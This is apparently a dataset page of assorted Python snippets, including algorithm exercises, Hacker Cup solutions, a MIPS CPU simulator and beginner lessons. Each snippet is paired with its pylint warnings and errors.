6 return subprocess.check_call(command, shell=True)
7
8 print shell('ls')
| 8 - error: syntax-error
|
1 print [x % 3/2 * 'Fizz' + x % 5/4 * 'Buzz' or x + 1 for x in range(100)]
| 1 - error: syntax-error
|
1 def fibonacci(n):
2 if n == 0:
3 return (0, 1)
4 else:
5 a, b = fibonacci(n/2)
6 c = a*(2*b - a)
7 d = b*b + a*a
8 return (c, d) if n%2 == 0 else (d, c+d)
9
10 print fibonacci(100000)[0] | 10 - error: syntax-error
|
1 # Run this script and enter 3 numbers separated by space
2 # example input '5 5 5'
3 a,b,c=map(int,raw_input().split())
4 for i in range(b+c+1):print(' '*(c-i)+((' /|'[(i>c)+(i>0)]+'_'*4)*(a+1))[:-4]+('|'*(b+c-i))[:b]+'/')[:5*a+c+1]
| 3 - error: undefined-variable
4 - warning: expression-not-assigned
|
1 class DictObject(dict):
2
3 def __getattr__(self, k):
4 return self[k]
5
6 def __setattr__(self, k, v):
7 return self[k]
8
9
10 obj = DictObject({'key' : 'value'})
11 print obj.key
| 11 - error: syntax-error
|
1 newlist = sorted(arr, key=lambda k: k['keyName'])
2
3 import operator
4 newlist = sorted(arr, key=operator.itemgetter('keyName'))
| 1 - error: undefined-variable
4 - error: undefined-variable
|
1 import functools
2
3 def my_check(func):
4
5 @functools.wraps(func)
6 def decorated_view(*args, **kwargs):
7 if 1 != 2:
8 return 'failure'
9 return func(*args, **kwargs)
10
11 return decorated_view
12
13
14 if __namae__ == '__main__':
15
16 @my_check
17 def hello():
18 return 'success'
| 5 - warning: bad-indentation
6 - warning: bad-indentation
7 - warning: bad-indentation
8 - warning: bad-indentation
9 - warning: bad-indentation
11 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
18 - warning: bad-indentation
7 - refactor: comparison-of-constants
14 - error: undefined-variable
|
1 def genPrimes(n):
2 n, correction = n - n%6 + 6, 2 - (n % 6 > 1)
3 sieve = [True] * (n/3)
4 for i in xrange(1, int(n**0.5) / 3 + 1):
5 if sieve[i]:
6 k = 3*i+1|1
7 sieve[k*k/3 ::2*k] = [False] * ((n/6 - k*k/6-1) / k+1)
8 sieve[k*(k-2*(i&1) + 4)/3 :: 2*k] = [False] * ((n/6 - k*(k-2*(i&1)+4)/6-1) / k+1)
9
10 return [2,3] + [3*i+1|1 for i in xrange(1,n/3-correction) if sieve[i]]
11
12 print genPrimes(10000) | 12 - error: syntax-error
|
1 def stringPermutations(string):
2 rez = []
3
4 if len(string) < 2:
5 rez.append(string)
6 else:
7 for position in range(len(string)):
8 perms = string[:position] + string[position+1:]
9 for i in stringPermutations(perms):
10 rez.append(string[position:position+1] + i)
11
12 return rez
13
14 print stringPermutations('abc') # ['abc', 'acb', 'bac', 'bca', 'cab', 'cba']
| 14 - error: syntax-error
|
1 '''
2 Facebook Hacker Cup 2012 Qualification Round
3
4 Alphabet Soup
5 Alfredo Spaghetti really likes soup, especially when it contains alphabet pasta. Every day he constructs
6 a sentence from letters, places the letters into a bowl of broth and enjoys delicious alphabet soup.
7
8 Today, after constructing the sentence, Alfredo remembered that the Facebook Hacker Cup starts today!
9 Thus, he decided to construct the phrase "HACKERCUP". As he already added the letters to the broth,
10 he is stuck with the letters he originally selected. Help Alfredo determine how many times he can place
11 the word "HACKERCUP" side-by-side using the letters in his soup.
12
13 Input
14 The first line of the input file contains a single integer T: the number of test cases. T lines follow,
15 each representing a single test case with a sequence of upper-case letters and spaces: the original
16 sentence Alfredo constructed.
17
18 Output
19 Output T lines, one for each test case. For each case, output "Case #t: n", where t is the test case
20 number (starting from 1) and n is the number of times the word "HACKERCUP" can be placed side-by-side
21 using the letters from the sentence.
22
23 Constraints
24 1 < T <= 20
25 Sentences contain only the upper-case letters A-Z and the space character
26 Each sentence contains at least one letter, and contains at most 1000 characters, including spaces
27 '''
28
29 import urllib
30 def parse(string):
31 d = {'H' : 0, 'A' : 0, 'C' : 0, 'K' : 0, 'E' : 0, 'R' : 0, 'U' : 0, 'P' : 0}
32 d.update({s: string.count(s) for s in string if s in d})
33 d['C'] /= 2
34 return min(d.values())
35
36 file = urllib.urlopen("https://raw.github.com/gist/1651354/67521ff0ac3332ca68713dfcd474a431c2d6c427/AlphabetSoupInput.txt").read().split('\n')
37 open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, parse(file[i]))) for i in range(1, len(file))]))
| 31 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
36 - error: no-member
37 - refactor: consider-using-with
37 - warning: unspecified-encoding
|
1 def stringCombinations(string, right = ''):
2 if not string:
3 print right
4 return
5
6 stringCombinations(string[1:], string[0] + right)
7 stringCombinations(string[1:], right)
8
9 stringCombinations('abcd')
| 3 - error: syntax-error
|
1 """
2 Beautiful Strings
3
4 When John was a little kid he didn't have much to do. There was no internet, no Facebook,
5 and no programs to hack on. So he did the only thing he could... he evaluated the beauty
6 of strings in a quest to discover the most beautiful string in the world.
7
8 Given a string s, little Johnny defined the beauty of the string as the sum of the beauty
9 of the letters in it.
10
11 The beauty of each letter is an integer between 1 and 26, inclusive, and no two letters
12 have the same beauty. Johnny doesn't care about whether letters are uppercase or lowercase,
13 so that doesn't affect the beauty of a letter.
14 (Uppercase 'F' is exactly as beautiful as lowercase 'f', for example.)
15
16 You're a student writing a report on the youth of this famous hacker. You found the string
17 that Johnny considered most beautiful. What is the maximum possible beauty of this string?
18
19
20 Input
21 The input file consists of a single integer m followed by m lines.
22
23 Output
24 Your output should consist of, for each test case, a line containing the string "Case #x: y"
25 where x is the case number (with 1 being the first case in the input file, 2 being the second, etc.)
26 and y is the maximum beauty for that test case.
27
28 Constraints
29 5 <= m <= 50
30 2 <= length of s <= 500
31
32
33 Example input Example output
34
35 5
36 ABbCcc Case #1: 152
37 Good luck in the Facebook Hacker Cup this year! Case #2: 754
38 Ignore punctuation, please :) Case #3: 491
39 Sometimes test cases are hard to make up. Case #4: 729
40 So I just go consult Professor Dalves Case #5: 646
41
42 """
43
44 import re, operator, urllib2
45
46
47 def getScore(s):
48 s = re.sub('[^A-Za-z]', '', s).lower()
49 total, x, d = 0, 26, {}
50 d.update({j: s.count(j) for j in s})
51 data = sorted(d.iteritems(), key=operator.itemgetter(1))[::-1]
52
53 for i in data:
54 total += i[1] * x
55 x -= 1
56
57 return total
58
59
60 file = urllib2.urlopen('https://gist.github.com/raw/4647356/f490a1df2ccda25553c70086205e38fc7e53647e/FBHackerCupBeautifulStrings.txt').read().split('\n')
61 open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, getScore(file[i]))) for i in range(1, len(file))][:-1]))
62
| 51 - error: no-member
61 - refactor: consider-using-with
61 - warning: unspecified-encoding
|
1 def eratosthenes_sieve(n):
2 candidates = list(range(n+1))
3 fin = int(n**0.5)
4
5 for i in xrange(2, fin+1):
6 if candidates[i]:
7 candidates[2*i::i] = [None] * (n//i - 1)
8
9 return [i for i in candidates[2:] if i] | 5 - error: undefined-variable
|
1 def qsort(list):
2 return [] if list==[] else qsort([x for x in list[1:] if x < list[0]]) + [list[0]] + qsort([x for x in list[1:] if x >= list[0]])
| 1 - warning: redefined-builtin
|
1 def multiply(x, y):
2 if x.bit_length() <= 1536 or y.bit_length() <= 1536:
3 return x * y;
4 else:
5 n = max(x.bit_length(), y.bit_length())
6 half = (n + 32) / 64 * 32
7 mask = (1 << half) - 1
8 xlow = x & mask
9 ylow = y & mask
10 xhigh = x >> half
11 yhigh = y >> half
12
13 a = multiply(xhigh, yhigh)
14 b = multiply(xlow + xhigh, ylow + yhigh)
15 c = multiply(xlow, ylow)
16 d = b - a - c
17
18 return (((a << half) + d) << half) + c | 3 - warning: unnecessary-semicolon
2 - refactor: no-else-return
|
1 array = ['duck', 'duck', 'goose']
2 print max(set(array), key=array.count)
| 2 - error: syntax-error
|
1 def powerset(array):
2 ps = [[]]
3 for i in array:
4 ps += [x + [array[i]] for x in ps]
5 return ps
6
7 print powerset([0, 1, 2, 3])
| 7 - error: syntax-error
|
1 def lengthOfNumber(n):
2 from math import log10, floor
3 return int(floor(log10(n)+1))
4
5 print lengthOfNumber(12321) # should give 2
| 5 - error: syntax-error
|
1 NO_STUDENTS = "There is no students for this teacher"
2
3
4 class Person(object):
5 def __init__(self, name):
6 self.name = name
7
8 def __str__(self):
9 return "My name is %s" % self.name
10
11
12 class Student(Person):
13 def __init__(self, name, group):
14 super(Student, self).__init__(name)
15 self.group = group
16
17 def __str__(self):
18 return "My name is %s and I'm from %s group" % (self.name, self.group)
19
20 def print_group(self):
21 return "My group is %s" % self.group
22
23
24 class Teacher(Person):
25 def __init__(self, name):
26 super(Teacher, self).__init__(name)
27 self.students = []
28
29 def add_student(self, student):
30 self.students.append(student)
31
32 def remove_student(self, student):
33 for current_student in self.students:
34 if student.name == current_student.name:
35 self.students.remove(current_student)
36
37 def __str__(self):
38 return "My name is %s and my students are:\n%s" % (self.name, self.get_all_students())
39
40 def get_all_students(self):
41 if self.students:
42 return "\n".join("%s" % st for st in self.students)
43 else:
44 return NO_STUDENTS
45
46
47 if __name__ == "__main__":
48 alice_student = Student("Alice", "12")
49 bob_student = Student("Bob", "12")
50 alex_teacher = Teacher("Alex")
51 assert alex_teacher.get_all_students() == NO_STUDENTS
52 alex_teacher.add_student(alice_student)
53 assert alex_teacher.get_all_students() == "%s" % alice_student
54 alex_teacher.add_student(bob_student)
55 print(alex_teacher)
56 alex_teacher.remove_student(alice_student)
57 assert alex_teacher.get_all_students() == "%s" % bob_student
| 4 - refactor: useless-object-inheritance
4 - refactor: too-few-public-methods
14 - refactor: super-with-arguments
26 - refactor: super-with-arguments
41 - refactor: no-else-return
|
1 #long ** is speciaal karakter betekend eigenlijk 2 tot de 123
2 MijnBankRekeningNummer = 2**123
3
4 #char
5 char VoorletterNaam = 'r' | 5 - error: syntax-error
|
1 #python heeft alleen float
2 ditIsEenfloat = 0.2422
3
4 #decimal
5 hoeveelKidsHebJe = decimal('1.31') | 5 - error: undefined-variable
|
1 #int
2 hoeveelKopjesSuiker = 2
3
4 #bool
5 IsDezePersoonMijnMatch = false
6 IsDezePersoonMijnMatch = true
7
8 #string
9 spreekwoord = "De kat op het spek binden"
10
| 5 - error: undefined-variable
6 - error: undefined-variable
|
1 def to_integer(binary_number):
2 if not isinstance(binary_number, str):
3 raise Exception()
4
5 return int(binary_number, 2)
6
7
8 def to_binary(number):
9 if not isinstance(number, int):
10 raise Exception()
11
12 return "{:0b}".format(number)
13
14
15 def extend_to_bits(binary_number, bits = 32):
16 if not isinstance(binary_number, str):
17 return None
18
19 number_length = len(binary_number)
20
21 result = bits - number_length
22
23 zero_fill = "0" * result
24
25 return "{}{}".format(zero_fill, binary_number)
26
27
28 def to_binaryC2(number, bits = 32):
29 if not isinstance(number, int):
30 raise Exception()
31
32 if number >= 0 :
33 number = to_binary(number)
34 number = extend_to_bits(number, bits)
35 return number
36 else:
37 number = 2**bits + number
38 number = to_binary(number)
39 number = extend_to_bits(number, bits)
40 return number
41
42
43 def to_decimalC2(binary_number):
44 if not isinstance(binary_number, str):
45 return None
46
47 bits = len(binary_number)
48
49 decimal = int(binary_number, 2)
50
51 if binary_number[0] == '0':
52 return decimal
53 else:
54 decimal = - (2**bits) + decimal
55 return decimal | 3 - warning: broad-exception-raised
10 - warning: broad-exception-raised
30 - warning: broad-exception-raised
32 - refactor: no-else-return
51 - refactor: no-else-return
|
1 from utils import (
2 extend_to_bits,
3 to_binary,
4 to_integer,
5 to_binaryC2,
6 to_decimalC2
7 )
8
9
10 class ALU:
11
12 def makeSum(self, a, b):
13
14 result = to_decimalC2(a) + to_decimalC2(b)
15
16 if result > (2**31 -1) or result < -(2**31):
17 print("{}OVERFLOW OCURRENCE{}".format("-" * 20, "-" * 7))
18
19 result = to_binaryC2(result)
20 return result
21
22 def makeSub(self, a, b):
23
24 result = to_decimalC2(a) - to_decimalC2(b)
25
26 if result > (2**31 -1) or result < -(2**31):
27 print("{}OVERFLOW OCURRENCE".format("-" * 26))
28
29 result = to_binaryC2(result)
30
31 return result
32
33 def makeAnd(self, a, b):
34
35 a = int(a, 2)
36 b = int(b, 2)
37
38 result = to_binary((a & b))
39
40 return extend_to_bits(result)
41
42 def makeOr(self, a, b):
43
44 a = int(a, 2)
45 b = int(b, 2)
46
47 result = to_binary((a | b))
48
49 return extend_to_bits(result)
50
51 def makeNot(self, a):
52 a_len = len(a)
53
54 a = to_decimalC2(a)
55
56 result = to_binaryC2(~a, a_len)
57
58 return result
| 1 - warning: unused-import
|
1 # Intruçoes que o programa reconhece
2 FUNCTIONS = {
3 '101011': 'sw',
4 '100011': 'lw',
5 '100000': 'add',
6 '100010': 'sub',
7 '100101': 'or',
8 '100100': 'and'
9 }
| Clean Code: No Issues Detected
|
1 from memory import RegistersBank, Memory
2 from logic import ALU
3 from instructions import PC
4 from control import (
5 ControlSw,
6 ControlLw,
7 ControlAdd,
8 ControlSub,
9 ControlAnd,
10 ControlOr,
11 )
12
13
14 class CPU:
15 def __init__(self):
16 self.alu = ALU()
17 self.pc = PC()
18 self.registers = RegistersBank()
19 self.memory = Memory()
20 self.control_types = {
21 'add': ControlAdd(self),
22 'sub': ControlSub(self),
23 'and': ControlAnd(self),
24 'or': ControlOr(self),
25 'lw': ControlLw(self),
26 'sw': ControlSw(self)
27 }
28
29 def execute(self):
30 for instruction in self.pc.get_instructions():
31 instruction_func = instruction.get_func()
32
33 self.control_types[instruction_func].execute()
| 14 - refactor: too-few-public-methods
|
1 from core import CPU
2
3
4 if __name__ == "__main__":
5 cpu = CPU()
6 cpu.execute()
| Clean Code: No Issues Detected
|
1 import random
2 from utils import to_binary, extend_to_bits, to_binaryC2
3
4
5 class BaseMemory:
6
7 def __init__(self):
8 self.data = {}
9
10 def set_value(self, address, value):
11 """
12 Set a value with a given address
13 """
14
15 self.data[address] = value
16
17 return True
18
19 def get_value(self, address):
20 """
21 Return a value with a given address
22 """
23
24 return self.data[address]
25
26
27 class RegistersBank(BaseMemory):
28 data = {}
29
30 def __new__(cls, *args, **kwargs):
31 """
32 Make the BaseMemory a Monostate class
33 """
34 obj = super(RegistersBank, cls).__new__(cls, *args, **kwargs)
35 obj.__dict__ = cls.data
36
37 return obj
38
39 def __init__(self):
40 total_registers = 2**5
41
42 for i in range(total_registers):
43 binary_number = to_binary(i)
44 if len(binary_number) < 5:
45 zero_fill = 5 - len(binary_number)
46 binary_number = "{}{}".format(
47 "0" * zero_fill,
48 binary_number
49 )
50
51 if i == 8:
52 self.data[binary_number] = extend_to_bits(to_binary(16))
53 else:
54 self.data[binary_number] = False
55
56
57 class Memory(BaseMemory):
58 data = {}
59
60 def __new__(cls, *args, **kwargs):
61 """
62 Make the BaseMemory a Monostate class
63 """
64 obj = super(Memory, cls).__new__(cls, *args, **kwargs)
65 obj.__dict__ = cls.data
66
67 return obj
68
69 def __init__(self):
70 total_data = 2**8
71
72 for i in range(total_data):
73 binary_number = to_binary(i)
74 binary_number = extend_to_bits(to_binary(i))
75
76 random_number = to_binaryC2(
77 random.randint(-(2**31), (2**31) - 1)
78 )
79 self.data[binary_number] = random_number
80
| 39 - warning: super-init-not-called
69 - warning: super-init-not-called
|
1 from li import FUNCTIONS
2 from utils import extend_to_bits
3
4 class MipsInstruction:
5 op = None
6 rs = None
7 rt = None
8 rd = None
9 shamt = None
10 func = None
11 offset = None
12 instruction_type = None
13 instruction = None
14
15 def __init__(self, instruction):
16 if not (isinstance(instruction, str) or len(instruction) == 32):
17 raise Exception()
18
19 self.instruction = instruction.replace('\n', '')
20 self.op = self.instruction[:6]
21
22 if self.op == '000000':
23 self._configure_to_registers()
24 else:
25 self._configure_to_imediate()
26
27 def _configure_to_imediate(self):
28 self.instruction_type = 'I'
29 self.rs = self.instruction[6:11]
30 self.rt = self.instruction[11:16]
31 self.offset = self.instruction[16:32]
32
33 return self.instruction
34
35 def _configure_to_registers(self):
36 self.instruction_type = 'R'
37 self.rs = self.instruction[6:11]
38 self.rt = self.instruction[11:16]
39 self.rd = self.instruction[16:21]
40 self.shamt = self.instruction[21:26]
41 self.func = self.instruction[26:32]
42
43 return self.instruction
44
45 def has_offset(self):
46 if self.instruction_type == 'R':
47 return False
48
49 return True
50
51 def get_type(self):
52 return self.instruction_type
53
54 def get_function(self):
55 return self.func
56
57 def get_registers(self):
58 registers = {
59 'rs': self.rs,
60 'rt': self.rt,
61 'rd': self.rd
62 }
63 return registers
64
65 def get_offset(self):
66 if not self.has_offset():
67 return None
68
69 return extend_to_bits(self.offset)
70
71 def get_func(self):
72 if self.op != '000000':
73 return FUNCTIONS[self.op]
74
75 return FUNCTIONS[self.func]
76
77 def __repr__(self):
78 representation = "-" * 64
79 representation += \
80 "\nInstruction: {}\nType: {}\nOperation: {}\n".format(
81 self.instruction,
82 self.instruction_type,
83 self.get_func()
84 )
85
86 representation += "-" * 64
87
88 return representation
89
90
91 class PC:
92 def __init__(self, filename="instructions_file.txt"):
93 self.file = open(filename, 'r')
94 self.next_instruction = None
95
96 def get_instructions(self):
97 """
98 Return a mips instruction object
99 for each instruction in the file
100 """
101
102 for instruction in self.file.readlines():
103 if self.next_instruction:
104 self.next_instruction = MipsInstruction(instruction)
105 else:
106 self.next_instruction = MipsInstruction(instruction)
107
108 yield self.next_instruction
| 28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
33 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
43 - warning: bad-indentation
4 - refactor: too-many-instance-attributes
17 - warning: broad-exception-raised
93 - warning: unspecified-encoding
93 - refactor: consider-using-with
91 - refactor: too-few-public-methods
|
1 from django.urls import path
2 from . import views
3
4
5 urlpatterns = [
6 path('traider', views.traider,name='traider'),
7 path('add_traid', views.add_traid,name='add_traid'),
8 path('compleat_traid', views.compleat_traid,name='compleat_traid'),
9 path('get_user_info', views.print_convertion,name='get_user_info'),
10 path('convertion', views.print_convertion,name='convertion'),
11 path('print_user', views.print_user,name='print_user'),
12 path('doit', views.doit,name='doit')
13
14 ]
15 #print_user
16
| 2 - error: no-name-in-module
|
1 import requests
2 r = requests.get('http://127.0.0.1:8080/number?number=1')
3 #print(r.status_code)
4 #print(r.text)
5 if "One" in r.text:
6 print("Passed Test")
7 else:
8 print("Failed Test")
9
10 if "Ok" in r.text:
11 print("Passed Test")
12 else:
13 print("Failed Test")
14
15
16 r = requests.get('http://127.0.0.1:8080/number?number=8')
17 #print(r.status_code)
18 #print(r.text)
19 if "Eight" in r.text:
20 print("Passed Test")
21 else:
22 print("Failed Test")
23
24
25
26 r = requests.get('http://127.0.0.1:8080/number?number=5A')
27 #print(r.status_code)
28 #print(r.text)
29 if "Five" in r.text:
30 print("Failed Test")
31 else:
32 print("Passed Test")
33
34 if "NAN" in r.text:
35 print("Passed Test")
36 else:
37 print("Failed Test")
38
39
40 r = requests.get('http://127.0.0.1:8080/number?number=')
41 #print(r.status_code)
42 #print(r.text)
43 if "NAN" in r.text:
44 print("Passed Test")
45 else:
46 print("Failed Test")
47
48
49 r = requests.get('http://127.0.0.1:8080/number?number=1000000000000000000000000000')
50 #print(r.status_code)
51 #print(r.text)
52 if "NTL" in r.text:
53 print("Passed Test")
54 else:
55 print("Failed Test")
56
57 r = requests.get('http://127.0.0.1:8080/number')
58 print(r.status_code)
59 print(r.text)
60 if "NAN" in r.text:
61 print("Passed Test")
62 else:
63 print("Failed Test")
64
65 r = requests.get('http://127.0.0.1:8080/number',data = {'number': '1'})
66
67 print(r.status_code)
68 print(r.text)
69 if "NAN" in r.text:
70 print("Passed Test")
71 else:
72 print("Failed Test")
| 2 - warning: missing-timeout
16 - warning: missing-timeout
26 - warning: missing-timeout
40 - warning: missing-timeout
49 - warning: missing-timeout
57 - warning: missing-timeout
65 - warning: missing-timeout
|
1 age = 20
2 name = 'zhuly'
3 print('{0} was {1} years old'.format(name, age))
| Clean Code: No Issues Detected
|
1
2 def sayhello():
3 print('hello wolrd,hello python!')
4
5 __version__='0.1'
| Clean Code: No Issues Detected
|
1 def func(a, b=5, c=10):
2 print('a=', a, ' b=', b, ' c=', c)
3
4
5 func(2, 7)
6 func(2, c=23)
7 func(c=23,a=9)
| Clean Code: No Issues Detected
|
1 number = 23
2 while True:
3
4 guess = int(input('请输入一个整数:'))
5 if guess == number:
6 print('恭喜,你猜对了。')
7 break
8 elif guess < number:
9 print('你猜小了')
10 else:
11 print('你猜大了')
12
13 print('end')
| 5 - refactor: no-else-break
|
1 poem = '''\
2 当工作完成时
3 编程是有趣的
4 如果想让你的工作有趣
5 使用Python!
6 '''
7
8 f = open('poem.txt', 'w')
9 f.write(poem)
10 f.close()
11
12 f = open('poem.txt', 'r')
13
14 while(True):
15 line = f.readline()
16 if len(line) == 0:
17 break
18 print(line, end='')
19 f.close()
| 8 - warning: unspecified-encoding
8 - refactor: consider-using-with
12 - warning: unspecified-encoding
12 - refactor: consider-using-with
|
1 def sayHello():
2 print('hello world,hello python!')
3
4 sayHello() | Clean Code: No Issues Detected
|
1
2 def reverse(text):
3 return text[::-1]
4
5
6 def is_palindrome(text):
7 return text == reverse(text)
8
9
10 something=input('输入文本:')
11
12 if is_palindrome(something):
13 print("是的,这是回文")
14 else:
15 print("这不是回文")
| Clean Code: No Issues Detected
|
1 import pickle
2
3 # 我们将要存储对象的文件名
4 shoplistfile = 'shoplist.data'
5
6 # 购物清单
7 shoplist = ['苹果', '芒果', '胡萝卜']
8
9 # 定到文件
10 f = open(shoplistfile, 'wb')
11
12 pickle.dump(shoplist, f)
13 f.close()
14
15 del shoplist # 释放shoplist变量
16
17 # 从仓库读回
18 f = open(shoplistfile, 'rb')
19 storedlist = pickle.load(f)
20 f.close()
21 print(storedlist)
| 10 - refactor: consider-using-with
18 - refactor: consider-using-with
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.